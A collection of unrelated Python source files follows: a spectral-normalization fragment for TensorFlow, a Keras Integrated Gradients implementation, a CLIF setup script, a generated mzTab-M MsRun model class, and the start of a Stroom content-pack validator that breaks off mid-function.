w shape [N, C, 1,..,1] or [N, 1,...,1, C], y shape [N, C, ...] or [N, ..., C]
:param x:
:param index: if index is provided, self.w is a list or tuple
:param offset: add a constant offset
:return:
"""
w = self.w if index is None else self.w[index]
return tf.multiply(x, w, name='scalar') if offset == 0.0 else tf.multiply(x, w + offset, name='scalar')
def _dense_(self, x, index=None):
""" This function defines a dense op: y = x * w, where x shape [..., a, b], w shape [..., b, c],
y shape [..., a, c]
:param x:
:param index: if index is provided, self.w is a list or tuple
:return:
"""
w = self.w if index is None else self.w[index]
return tf.matmul(x, w, name='dense')
def _dense_t_(self, y, index=None):
""" Transpose version of self._dense_
:param y:
:param index: if index is provided, self.w is a list or tuple
:return:
"""
w = self.w if index is None else self.w[index]
return tf.matmul(y, w, transpose_b=True, name='dense_t')
def _conv_(self, x, index=None):
""" This function defines a conv op: y = x \otimes w, where x shape NCHW or NHWC, w shape kkhw,
y shape NCHW or NHWC
:param x:
:param index: if index is provided, self.w is a list or tuple
:return:
"""
w = self.w if index is None else self.w[index]
if self.sn_def['dilation'] > 1:
return tf.nn.atrous_conv2d(
x, w, rate=self.sn_def['dilation'], padding=self.sn_def['padding'], name='conv')
else:
return tf.nn.conv2d(
x, w, strides=self.sn_def['strides'], padding=self.sn_def['padding'],
data_format=self.sn_def['data_format'], name='conv')
def _conv_t_(self, y, x_shape, index=None):
""" Transpose version of self._conv_
:param y:
:param x_shape:
:param index:
:return:
"""
w = self.w if index is None else self.w[index]
if self.sn_def['dilation'] > 1:
return tf.nn.atrous_conv2d_transpose(
y, w, output_shape=x_shape, rate=self.sn_def['dilation'], padding=self.sn_def['padding'],
name='conv_t')
else:
return tf.nn.conv2d_transpose(
y, w, output_shape=x_shape, strides=self.sn_def['strides'], padding=self.sn_def['padding'],
data_format=self.sn_def['data_format'], name='conv_t')
def _l2_norm(self, x):
if self.sn_def['op'] in {'cd'}: # x shape [num_class, 1, num_in or num_out]
return tf.norm(x, ord='euclidean', axis=2, keepdims=True) # return [num_class, 1, 1]
elif self.sn_def['op'] in {'dck'}: # x shape [num_class, num_in or num_out]
return tf.norm(x, ord='euclidean', axis=1, keepdims=True) # return [num_class, 1]
elif self.sn_def['op'] in {'cck', 'tcck'}:
# x shape [num_class, num_in or num_out, H, W] or [num_class, H, W, num_in or num_out]
# here i did not use tf.norm because axis cannot be (1, 2, 3)
return tf.sqrt(
tf.reduce_sum(tf.square(x), axis=(1, 2, 3), keepdims=True), name='norm') # return [num_class, 1, 1, 1]
elif self.sn_def['op'] in {'d', 'c', 'tc', 'project'}:
# x shape [1, num_in or num_out], or [1, num_in or num_out, H, W] or [1, H, W, num_in or num_out]
return tf.norm(x, ord='euclidean', axis=None) # return scalar
def _l2_normalize_(self, w):
"""
:param w:
:return:
"""
return w / (self._l2_norm(w) + FLAGS.EPSI)
def _power_iter_(self, x, step):
""" This function does power iteration for one step
:param x:
:param step:
:return:
"""
y = self._l2_normalize_(self.forward(x))
x_update = self._l2_normalize_(self.backward(y))
sigma = self._l2_norm(self.forward(x))
return sigma, x_update, step + 1
def _power_iter_no_step(self, x):
y = self._l2_normalize_(self.forward(x))
x_update = self._l2_normalize_(self.backward(y))
sigma = self._l2_norm(self.forward(x))
return sigma, x_update
def __call__(self, kernel, **kwargs):
""" This function calculates spectral normalization for kernel
:param kernel:
:param kwargs:
:return:
"""
# check inputs
if 'name_scope' in kwargs and kwargs['name_scope'] != self.name_scope:
# different name_scope will initialize another SN process
self.name_scope = kwargs['name_scope']
self.name_in_err = self.scope_prefix + self.name_scope
if self.is_initialized:
warnings.warn(
'{}: a new SN process caused lost of links to the previous one.'.format(self.name_in_err))
self.is_initialized = False
self.use_u = None
if 'num_iter' in kwargs:
self.num_iter = kwargs['num_iter']
if isinstance(kernel, (list, tuple)):
# for dcd, cck, the kernel is a list of two kernels
kernel_shape = [k.get_shape().as_list() for k in kernel]
else:
kernel_shape = kernel.get_shape().as_list()
with tf.compat.v1.variable_scope(self.name_scope, reuse=tf.compat.v1.AUTO_REUSE):
# In some cases, the spectral norm can be easily calculated.
sigma = None
if self.sn_def['op'] in {'d', 'project'} and 1 in kernel_shape:
# for project op. kernel_shape = [num_class, num_in]
sigma = tf.norm(kernel, ord='euclidean')
elif self.sn_def['op'] in {'cd'}:
if len(kernel_shape) == 2: # equivalent to [num_class, num_in, 1]
sigma = tf.norm(kernel, ord='euclidean', axis=1, keepdims=True)
elif kernel_shape[1] == 1 or kernel_shape[2] == 1:
sigma = tf.norm(kernel, ord='euclidean', axis=(1, 2), keepdims=True)
elif self.sn_def['op'] in {'dcd'}: # dense + conditional dense
# kernel_cd [num_class, num_in, num_out]
kernel_cd = tf.expand_dims(kernel[1], axis=2) if len(kernel_shape[1]) == 2 else kernel[1]
kernel = tf.expand_dims(kernel[0], axis=0) + kernel_cd # [num_class, num_in, num_out]
if 1 in kernel_shape[0]: # kernel_d shape [1, num_out] or [num_in, 1]
sigma = tf.norm(kernel, ord='euclidean', axis=(1, 2), keepdims=True) # [num_class, 1, 1]
else: # convert dcd to cd
kernel_shape = kernel.get_shape().as_list()
self.sn_def['op'] = 'cd'
elif self.sn_def['op'] in {'dck'}: # dense * conditional scales
if kernel_shape[0][1] == 1:
sigma = tf.norm(kernel[0], ord='euclidean') * tf.abs(kernel[1]) # [num_class, 1]
# initialize a random input and calculate spectral norm
if sigma is None:
# decide the routine
self.w = kernel
self.kernel_shape = kernel_shape
self._init_routine()
# initialize sigma
if self.sn_def['op'] in {'dck'}:
sigma_init = tf.zeros((self.kernel_shape[1][0], 1), dtype=tf.float32)
elif self.sn_def['op'] in {'cd'}: # for cd, the sigma is a [num_class, 1, 1]
sigma_init = tf.zeros((self.kernel_shape[0], 1, 1), dtype=tf.float32)
elif self.sn_def['op'] in {'cck', 'tcck'}:
sigma_init = tf.zeros((self.kernel_shape[1][0], 1, 1, 1), dtype=tf.float32)
else:
sigma_init = tf.constant(0.0, dtype=tf.float32)
# do power iterations
# NEW: If num num_iter is 1, which it typically should be, don't build a loop, just call it once!
if self.num_iter == 1:
# print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ no sn loop')
sigma, x_update = self._power_iter_no_step(self.x)
else:
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ doing sn loop: may interfere with DP-SGD')
sigma, x_update, _ = tf.while_loop(
cond=lambda _1, _2, i: i < self.num_iter,
body=lambda _1, x, i: self._power_iter_(x, step=i),
loop_vars=(sigma_init, self.x, tf.constant(0, dtype=tf.int32)),
name='spectral_norm_while')
# update the random input
tf.compat.v1.add_to_collection(tf.compat.v1.GraphKeys.UPDATE_OPS, tf.compat.v1.assign(self.x, x_update))
return sigma
def apply(self, kernel, **kwargs):
return self.__call__(kernel, **kwargs)
|
################################################################
# Implemented by Naozumi Hiranuma (hiranumn@uw.edu) #
# #
# Keras-compatible implmentation of Integrated Gradients #
# proposed in "Axiomatic attribution for deep neuron networks" #
# (https://arxiv.org/abs/1703.01365). #
# #
# Keywords: Shapley values, interpretable machine learning #
################################################################
from __future__ import division, print_function
import numpy as np
from time import sleep
import sys
import keras.backend as K
from keras.models import Model, Sequential
'''
Integrated gradients approximates Shapley values by integrating partial
gradients with respect to input features from reference input to the
actual input. The following class implements the paper "Axiomatic attribution
for deep neuron networks".
'''
class integrated_gradients:
# model: Keras model that you wish to explain.
# outchannels: In case the model are multi tasking, you can specify which output you want explain .
def __init__(self, model, outchannels=[], verbose=1):
#get backend info (either tensorflow or theano)
self.backend = K.backend()
#load model supports keras.Model and keras.Sequential
if isinstance(model, Sequential):
self.model = model.model
elif isinstance(model, Model):
self.model = model
else:
print("Invalid input model")
return -1
#load input tensors
self.input_tensors = []
for i in self.model.inputs:
self.input_tensors.append(i)
# The learning phase flag is a bool tensor (0 = test, 1 = train)
# to be passed as input to any Keras function that uses
# a different behavior at train time and test time.
self.input_tensors.append(K.learning_phase())
#If outputchanels are specified, use it.
#Otherwise evalueate all outputs.
self.outchannels = outchannels
if len(self.outchannels) == 0:
if verbose: print("Evaluated output channel (0-based index): All")
if K.backend() == "tensorflow":
self.outchannels = range(self.model.output.shape[1]._value)
elif K.backend() == "theano":
self.outchannels = range(self.model.output._keras_shape[1])
else:
if verbose:
print("Evaluated output channels (0-based index):")
print(','.join([str(i) for i in self.outchannels]))
#Build gradient functions for desired output channels.
self.get_gradients = {}
if verbose: print("Building gradient functions")
# Evaluate over all requested channels.
for c in self.outchannels:
# Get tensor that calculates gradient
if K.backend() == "tensorflow":
gradients = self.model.optimizer.get_gradients(self.model.output[:, c], self.model.input)
if K.backend() == "theano":
gradients = self.model.optimizer.get_gradients(self.model.output[:, c].sum(), self.model.input)
# Build computational graph that computes the tensors given inputs
self.get_gradients[c] = K.function(inputs=self.input_tensors, outputs=gradients)
# This takes a lot of time for a big model with many tasks.
# So lets print the progress.
if verbose:
sys.stdout.write('\r')
sys.stdout.write("Progress: "+str(int((c+1)*1.0/len(self.outchannels)*1000)*1.0/10)+"%")
sys.stdout.flush()
# Done
if verbose: print("\nDone.")
'''
Input: sample to explain, channel to explain
Optional inputs:
- reference: reference values (defaulted to 0s).
- steps: # steps from reference values to the actual sample (defualted to 50).
Output: list of numpy arrays to integrated over.
'''
def explain(self, sample, outc=0, reference=False, num_steps=50, verbose=0):
# Each element for each input stream.
samples = []
numsteps = []
step_sizes = []
# If multiple inputs are present, feed them as list of np arrays.
if isinstance(sample, list):
#If reference is present, reference and sample size need to be equal.
if reference != False:
assert len(sample) == len(reference)
for i in range(len(sample)):
if reference == False:
_output = integrated_gradients.linearly_interpolate(sample[i], False, num_steps)
else:
_output = integrated_gradients.linearly_interpolate(sample[i], reference[i], num_steps)
samples.append(_output[0])
numsteps.append(_output[1])
step_sizes.append(_output[2])
# Or you can feed just a single numpy arrray.
elif isinstance(sample, np.ndarray):
_output = integrated_gradients.linearly_interpolate(sample, reference, num_steps)
samples.append(_output[0])
numsteps.append(_output[1])
step_sizes.append(_output[2])
# Desired channel must be in the list of outputchannels
assert outc in self.outchannels
if verbose: print("Explaning the "+str(self.outchannels[outc])+"th output.")
# For tensorflow backend
_input = []
for s in samples:
_input.append(s)
_input.append(0)
if K.backend() == "tensorflow":
gradients = self.get_gradients[outc](_input)
elif K.backend() == "theano":
gradients = self.get_gradients[outc](_input)
if len(self.model.inputs) == 1:
gradients = [gradients]
explanation = []
for i in range(len(gradients)):
_temp = np.sum(gradients[i], axis=0)
explanation.append(np.multiply(_temp, step_sizes[i]))
# Format the return values according to the input sample.
if isinstance(sample, list):
return explanation
elif isinstance(sample, np.ndarray):
return explanation[0]
return -1
'''
Input: numpy array of a sample
Optional inputs:
- reference: reference values (defaulted to 0s).
- steps: # steps from reference values to the actual sample.
Output: list of numpy arrays to integrate over.
'''
@staticmethod
def linearly_interpolate(sample, reference=False, num_steps=50):
# Use default reference values if reference is not specified
if reference is False: reference = np.zeros(sample.shape);
# Reference and sample shape needs to match exactly
assert sample.shape == reference.shape
# Calcuated stepwise difference from reference to the actual sample.
ret = np.zeros(tuple([num_steps] +[i for i in sample.shape]))
for s in range(num_steps):
ret[s] = reference+(sample-reference)*(s*1.0/num_steps)
return ret, num_steps, (sample-reference)*(1.0/num_steps)
|
#!/usr/bin/env python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup configuration."""
import glob
import os
import pathlib
import typing
from clif import extension
import setuptools
def _find_clif_modules() -> typing.Iterable[extension.CLIFExtension]:
"""Build list of CLIFExtensions based on CLIF-generated sources under cwd.
Returns:
list of CLIF extensions for setuptools.setup's ext_modules arg
"""
modules = []
for clif_init in glob.glob('**/*_init.cc', recursive=True):
module_dir = pathlib.Path(clif_init).parts[0]
module_name = clif_init.replace('/', '.').replace('_init.cc', '')
clif_sources = [
# CLIF-generated sources (module.cc, module_init.cc)
clif_init.replace('_init', ''),
clif_init,
]
libraries = []
for lib in glob.glob(os.path.join(module_dir, 'lib*.a')):
lib = pathlib.Path(lib).stem.replace('lib', '', 1)
libraries.append(lib)
clif_extension = extension.CLIFExtension(
module_name, clif_sources, include_dirs=['./'],
libraries=libraries,
library_dirs=[module_dir])
modules.append(clif_extension)
return modules
setuptools.setup(
name='pyclif_examples',
version='1.0',
description='Python CLIF examples',
url='https://github.com/google/clif',
author='CLIF authors',
author_email='pyclif@googlegroups.com',
ext_modules=_find_clif_modules(),
)
|
# coding: utf-8
"""
mzTab-M reference implementation and validation API.
This is the mzTab-M reference implementation and validation API service. # noqa: E501
OpenAPI spec version: 2.0.0
Contact: nils.hoffmann@isas.de
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from mztab_m_swagger_client.models.indexed_element import IndexedElement # noqa: F401,E501
from mztab_m_swagger_client.models.instrument import Instrument # noqa: F401,E501
from mztab_m_swagger_client.models.parameter import Parameter # noqa: F401,E501
class MsRun(IndexedElement):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'location': 'str',
'instrument_ref': 'Instrument',
'format': 'Parameter',
'id_format': 'Parameter',
'fragmentation_method': 'list[Parameter]',
'scan_polarity': 'list[Parameter]',
'hash': 'str',
'hash_method': 'Parameter'
}
attribute_map = {
'name': 'name',
'location': 'location',
'instrument_ref': 'instrument_ref',
'format': 'format',
'id_format': 'id_format',
'fragmentation_method': 'fragmentation_method',
'scan_polarity': 'scan_polarity',
'hash': 'hash',
'hash_method': 'hash_method'
}
def __init__(self, name=None, location=None, instrument_ref=None, format=None, id_format=None, fragmentation_method=None, scan_polarity=None, hash=None, hash_method=None, **kwargs): # noqa: E501
"""MsRun - a model defined in Swagger""" # noqa: E501
super(MsRun, self).__init__(element_type="MsRun", **kwargs)
self._name = None
self._location = None
self._instrument_ref = None
self._format = None
self._id_format = None
self._fragmentation_method = None
self._scan_polarity = None
self._hash = None
self._hash_method = None
self.discriminator = 'element_type'
self.name = name
self.location = location
if instrument_ref is not None:
self.instrument_ref = instrument_ref
if format is not None:
self.format = format
if id_format is not None:
self.id_format = id_format
if fragmentation_method is not None:
self.fragmentation_method = fragmentation_method
if scan_polarity is not None:
self.scan_polarity = scan_polarity
if hash is not None:
self.hash = hash
if hash_method is not None:
self.hash_method = hash_method
@property
def name(self):
"""Gets the name of this MsRun. # noqa: E501
The msRun's name. # noqa: E501
:return: The name of this MsRun. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this MsRun.
The msRun's name. # noqa: E501
:param name: The name of this MsRun. # noqa: E501
:type: str
"""
# if name is None:
# raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def location(self):
"""Gets the location of this MsRun. # noqa: E501
The msRun's location URI. # noqa: E501
:return: The location of this MsRun. # noqa: E501
:rtype: str
"""
return self._location
@location.setter
def location(self, location):
"""Sets the location of this MsRun.
The msRun's location URI. # noqa: E501
:param location: The location of this MsRun. # noqa: E501
:type: str
"""
if location is None:
raise ValueError("Invalid value for `location`, must not be `None`") # noqa: E501
self._location = location
@property
def instrument_ref(self):
"""Gets the instrument_ref of this MsRun. # noqa: E501
The instrument on which this msRun was measured. # noqa: E501
:return: The instrument_ref of this MsRun. # noqa: E501
:rtype: Instrument
"""
return self._instrument_ref
@instrument_ref.setter
def instrument_ref(self, instrument_ref):
"""Sets the instrument_ref of this MsRun.
The instrument on which this msRun was measured. # noqa: E501
:param instrument_ref: The instrument_ref of this MsRun. # noqa: E501
:type: Instrument
"""
self._instrument_ref = instrument_ref
@property
def format(self):
"""Gets the format of this MsRun. # noqa: E501
The msRun's file format. # noqa: E501
:return: The format of this MsRun. # noqa: E501
:rtype: Parameter
"""
return self._format
@format.setter
def format(self, format):
"""Sets the format of this MsRun.
The msRun's file format. # noqa: E501
:param format: The format of this MsRun. # noqa: E501
:type: Parameter
"""
self._format = format
@property
def id_format(self):
"""Gets the id_format of this MsRun. # noqa: E501
The msRun's mass spectra id format. # noqa: E501
:return: The id_format of this MsRun. # noqa: E501
:rtype: Parameter
"""
return self._id_format
@id_format.setter
def id_format(self, id_format):
"""Sets the id_format of this MsRun.
The msRun's mass spectra id format. # noqa: E501
:param id_format: The id_format of this MsRun. # noqa: E501
:type: Parameter
"""
self._id_format = id_format
@property
def fragmentation_method(self):
"""Gets the fragmentation_method of this MsRun. # noqa: E501
The fragmentation methods applied during this msRun. # noqa: E501
:return: The fragmentation_method of this MsRun. # noqa: E501
:rtype: list[Parameter]
"""
return self._fragmentation_method
@fragmentation_method.setter
def fragmentation_method(self, fragmentation_method):
"""Sets the fragmentation_method of this MsRun.
The fragmentation methods applied during this msRun. # noqa: E501
:param fragmentation_method: The fragmentation_method of this MsRun. # noqa: E501
:type: list[Parameter]
"""
self._fragmentation_method = fragmentation_method
@property
def scan_polarity(self):
"""Gets the scan_polarity of this MsRun. # noqa: E501
The scan polarity/polarities used during this msRun. # noqa: E501
:return: The scan_polarity of this MsRun. # noqa: E501
:rtype: list[Parameter]
"""
return self._scan_polarity
@scan_polarity.setter
def scan_polarity(self, scan_polarity):
"""Sets the scan_polarity of this MsRun.
The scan polarity/polarities used during this msRun. # noqa: E501
:param scan_polarity: The scan_polarity of this MsRun. # noqa: E501
:type: list[Parameter]
"""
self._scan_polarity = scan_polarity
@property
def hash(self):
"""Gets the hash of this MsRun. # noqa: E501
The file hash value of this msRun's data file. # noqa: E501
:return: The hash of this MsRun. # noqa: E501
:rtype: str
"""
return self._hash
@hash.setter
def hash(self, hash):
"""Sets the hash of this MsRun.
The file hash value of this msRun's data file. # noqa: E501
:param hash: The hash of this MsRun. # noqa: E501
:type: str
"""
self._hash = hash
@property
def hash_method(self):
"""Gets the hash_method of this MsRun. # noqa: E501
The hash method used to calculate the file hash. # noqa: E501
:return: The hash_method of this MsRun. # noqa: E501
:rtype: Parameter
"""
return self._hash_method
@hash_method.setter
def hash_method(self, hash_method):
"""Sets the hash_method of this MsRun.
The hash method used to calculate the file hash. # noqa: E501
:param hash_method: The hash_method of this MsRun. # noqa: E501
:type: Parameter
"""
self._hash_method = hash_method
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(IndexedElement, dict):
for key, value in super.items():
result[key] = value
if issubclass(MsRun, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, MsRun):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
#!/usr/bin/env python3
#**********************************************************************
# Copyright 2016 Crown Copyright
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#**********************************************************************
#**********************************************************************
# validateContentPacks.py
#
# Usage: validateContentPacks.py [--all] [packName ...]
# e.g.: validateContentPacks.py stroom-101 core-xml-schemas
# validateContentPacks.py --all
#
# Script to validate one or more content packs
#
# packName is the name of the sub-folder in stroom-content-source.
# Anything inside this folder is considered stroom content relative to
# stroom's root folder
# --all indicates to build all pack folders found in stroom-content-source
#
#**********************************************************************
import configparser
import fnmatch
import logging
import os
import re
import shutil
import sys
import time
import xml.etree.ElementTree as ET
import zipfile
# logging.basicConfig(level=logging.DEBUG)
USAGE_TXT = "\
Usage:\nvalidateContentPacks.py [--all] [packName ...]\n\
e.g.\n\
To validate all content packs - buildPacks.py --all\n\
To validate specific named content packs - validateContentPacks.py pack-1 pack-2 pack-n"
SOURCE_DIR_NAME = "source"
TARGET_DIR_NAME = "target"
STROOM_CONTENT_DIR_NAME = "stroomContent"
FOLDER_ENTITY_TYPE = "folder"
FOLDER_ENTITY_SUFFIX = ".Folder.xml"
root_path = os.path.dirname(os.path.realpath(__file__))
source_path = os.path.join(root_path, SOURCE_DIR_NAME)
target_path = os.path.join(root_path, TARGET_DIR_NAME)
# Class for ascii colour codes for use in print statements
class Col:
RED = '\033[0;31m'
BRED = '\033[1;31m'
GREEN = '\033[0;32m'
BOLD_GREEN = '\033[1;32m'
YELLOW = '\033[0;33m'
BOLD_YELLOW = '\033[1;33m'
BLUE = '\033[0;34m'
BOLD_BLUE = '\033[1;34m'
LIGHT_GREY = '\033[37m'
DARK_GREY = '\033[90m'
MAGENTA = '\033[0;35m'
BOLD_MAGENTA = '\033[1;35m'
CYAN = '\033[0;36m'
BOLD_CYAN = '\033[1;36m'
NC = '\033[0m' # No Color
@staticmethod
def _colourise(string, colour_code):
return ''.join([colour_code, string, Col.NC])
@staticmethod
def red(string):
return Col._colourise(string, Col.RED)
@staticmethod
def bold_red(string):
return Col._colourise(string, Col.BRED)
@staticmethod
def green(string):
return Col._colourise(string, Col.GREEN)
@staticmethod
def bold_green(string):
return Col._colourise(string, Col.BOLD_GREEN)
@staticmethod
def yellow(string):
return Col._colourise(string, Col.YELLOW)
@staticmethod
def bold_yellow(string):
return Col._colourise(string, Col.BOLD_YELLOW)
@staticmethod
def blue(string):
return Col._colourise(string, Col.BLUE)
@staticmethod
def bold_blue(string):
return Col._colourise(string, Col.BOLD_BLUE)
@staticmethod
def light_grey(string):
return Col._colourise(string, Col.LIGHT_GREY)
@staticmethod
def dark_grey(string):
return Col._colourise(string, Col.DARK_GREY)
@staticmethod
def magenta(string):
return Col._colourise(string, Col.MAGENTA)
@staticmethod
def bold_magenta(string):
return Col._colourise(string, Col.BOLD_MAGENTA)
@staticmethod
def cyan(string):
return Col._colourise(string, Col.CYAN)
@staticmethod
def bold_cyan(string):
return Col._colourise(string, Col.BOLD_CYAN)
# Class to represent a folder in the heirarchy of folders/entities.
# A folder can contain many child folders and many child entities
class Folder:
def __init__(self, full_path, name, parent):
self.full_path = full_path
self.name = name
self.parent = parent
# (entity_type, name) => DocRef dict
self.entities = dict()
# name => Folder dict
self.child_folders = dict()
def __str__(self):
return "full_path: {}, name: {}".format(self.full_path, self.name)
# Adds an entity to this folder
def _add_entity(self, doc_ref):
key = (doc_ref.entity_type, doc_ref.name)
if not key in self.entities:
self.entities[key] = doc_ref
else:
existing_doc_ref = self.entities[key]
print_error(("Multiple entities with the same name and type in "
+ "folder {}, name: {}, type: {}, UUIDs: {}, {}")
.format(
Col.blue(self.full_path),
Col.green(doc_ref.name),
Col.cyan(doc_ref.entity_type),
Col.yellow(existing_doc_ref.uuid),
Col.yellow(doc_ref.uuid)))
print("\nDisplaying tree so far")
self.print_tree()
exit(1)
# Adds a child folder with passed name to the dict of child folders
# Returns the created folder instance
def _add_child_folder(self, name):
if not name in self.child_folders:
logging.debug("Creating child folder {} in folder [{}]".format(
name, self))
if (self.full_path == ""):
child_full_path = name
else:
child_full_path = "/".join([self.full_path, name])
child_full_path = child_full_path.replace("//", "/")
child_folder = Folder(child_full_path, name, self)
self.child_folders[name] = child_folder
else:
logging.debug("Folder {} already exists in folder [{}]".format(
name, self))
return self.child_folders[name]
# Adds node to this folder, creating intermediate folders as required
def add_node(self, node):
logging.debug("add_node called, self [{}] to folder [{}]"
.format(self, self))
# time.sleep(0.5)
if node.path == self.full_path:
# entity belongs in this folder so just add it
logging.debug("Adding entity [{}] to folder [{}]"
.format(node.doc_ref, self))
self._add_entity(node.doc_ref)
else:
# entity belongs further down so create the folder at this
# level and try again
logging.debug("node.path [{}], self.full_path [{}]"
.format(node.path, self.full_path))
# ensure we have no trailing slash
relative_folder = node.path.rstrip("/")
# if self is /A/B and node is /A/B/C/D
# the relative path is /C/D
relative_folder = relative_folder.replace(self.full_path, "")
relative_folder = relative_folder.lstrip("/")
child_folder_name = relative_folder.split("/")[0]
logging.debug("relative_folder [{}], child_folder_name [{}]"
.format(relative_folder, child_folder_name))
child_folder = self._add_child_folder(child_folder_name)
# recursive call to continue trying to add the node
child_folder.add_node(node)
# Print this folder and all folders/entities below it
def print_tree(self, level=-1):
logging.debug("print_tree called with self [{}], level {}"
.format(self, level))
single_indent = " "
indent_str = single_indent * level
if (self.name != None):
print("{}+ {}".format(
indent_str,
Col.bold_blue(self.name)))
# Output all the folders (and their contents) first
for child_folder_name, child_folder in sorted(self.child_folders.items()):
child_folder.print_tree(level + 1)
# Now output all the entities, sorted by name then entity type
for type_name_tuple, doc_ref in sorted(
self.entities.items(),
key=lambda item: (item[0][1], item[0][0])):
preV6Str = "(pre-v6)" if doc_ref.isPreV6 else ""
print("{}{}- {} [{}] {} {}"
.format(
indent_str,
single_indent,
Col.green(doc_ref.name),
Col.cyan(doc_ref.entity_type),
Col.dark_grey(doc_ref.uuid),
Col.red(preV6Str)))
@staticmethod
def create_root_folder():
return Folder("", None, None)
# Class to represent a stroom DocRef object that uniquely defines an entity
class DocRef:
def __init__(self, entity_type, uuid, name, isPreV6=False):
self.entity_type = entity_type
self.uuid = uuid
self.name = name
self.isPreV6 = isPreV6
def __str__(self):
return "entity_type: {}, uuid: {}, name: {}, isPreV6 {}".format(
self.entity_type, self.uuid, self.name, self.isPreV6)
# Class to represent a .node file, i.e. a DocRef with a path to provide a
# location in the folder tree
class Node:
# def __init__(self, path, entity_type, uuid, name):
def __init__(self, path, doc_ref):
self.path = path
self.doc_ref = doc_ref
def __str__(self):
return "path: {}, doc_ref: {}".format(self.path, self.doc_ref)
def list_content_packs():
for the_file in os.listdir(source_path):
file_path = os.path.join(source_path, the_file)
if os.path.isdir(file_path):
print(" " + the_file)
def print_usage():
print(USAGE_TXT)
print("\nAvailable content packs:")
list_content_packs()
print("\n")
def print_error(msg):
print(''.join([Col.red("ERROR"), " - ", msg]))
def error_exit(msg):
print_error(msg)
exit(1)
def extract_doc_ref_from_xml(entity_file):
if not os.path.isfile(entity_file):
error_exit("Entity file {} does not exist".format(entity_file))
# logging.debug("Extracting uuid for {}".format(entity_file))
xml_root = ET.parse(entity_file).getroot()
entity_type = xml_root.tag
uuidElm = xml_root.find('uuid')
nameElm = xml_root.find('name')
uuid = uuidElm.text if uuidElm != None else None
name = nameElm.text if nameElm != None else None
return DocRef(entity_type, uuid, name, True)
def parse_node_file(node_file):
if not os.path.isfile(node_file):
error_exit("Node file {} does not exist".format(node_file))
dummy_section_name = 'dummy_section'
# ConfigParser is meant to deal with .ini files so adding dummy_section
# is a bit of a hack to work with section-less config files that look
# like .ini files.
with open(node_file, 'r') as f:
config_string = '[' + dummy_section_name + ']\n' + f.read()
config = configparser.ConfigParser()
config.read_string(config_string)
return config[dummy_section_name]
# Turn the doc_ref name into a safe form for use in a filename
def get_safe_file_name(doc_ref):
# Logic duplicated from
# stroom.importexport.server.ImportExportFileNameUtil
safe_name = re.sub("[^A-Za-z0-9]", "_", doc_ref.name)
# Limit to 100 chars
safe_name = safe_name[0:100]
return safe_name
def validate_node_against_node_file(node, node_file):
# This validation matches the code in
# stroom.importexport.server.ImportExportFileNameUtil
filename = os.path.basename(node_file)
doc_ref = node.doc_ref
safe_name = get_safe_file_name(doc_ref)
pattern = "{}\.{}\.{}\.node".format(
safe_name, doc_ref.entity_type, doc_ref.uuid)
if re.match(pattern, filename) == None:
error_exit("The name of node file {} does not match expected pattern {}"
.format(
Col.blue(node_file),
Col.green(pattern)))
def extract_node_from_node_file(node_file):
node_config = parse_node_file(node_file)
uuid = node_config.get('uuid')
entity_type = node_config.get('type')
name = node_config.get('name')
path = node_config.get('path')
doc_ref = DocRef(entity_type, uuid, name)
node = Node(path, doc_ref)
validate_node_against_node_file(node, node_file)
return node
def validate_pre_stroom_six_folder_uuids(stroom_content_path, path_to_uuid_dict):
logging.debug("validate_pre_stroom_six_folder_uuids([{}]) called"
.format(stroom_content_path))
# make sure we don't have multiple folder entities with
# different uuids else this may cause odd behaviour on import
for root, dirnames, filenames in os.walk(stroom_content_path):
for dirname in dirnames:
logging.debug("dirname: {}".format(dirname))
full_filename = os.path.join(
root, dirname, '..', dirname + FOLDER_ENTITY_SUFFIX)
logging.debug("full_filename: {}".format(full_filename))
entity_path = os.path.relpath(
os.path.join(root, dirname), stroom_content_path)
logging.debug("entity_path: {}".format(entity_path))
doc_ref = extract_doc_ref_from_xml(full_filename)
uuid = doc_ref.uuid
if uuid == None:
error_exit("Entity file {} does not have a UUID"
.format(Col.blue(full_filename)))
logging.debug("uuid = {}".format(uuid))
if not entity_path in path_to_uuid_dict:
path_to_uuid_dict[entity_path] = uuid
elif path_to_uuid_dict[entity_path] != uuid:
error_exit("Multiple uuids exist for path {}"
.format(Col.blue(entity_path)))
def is_pack_stroom_six_or_greater(pack_dir):
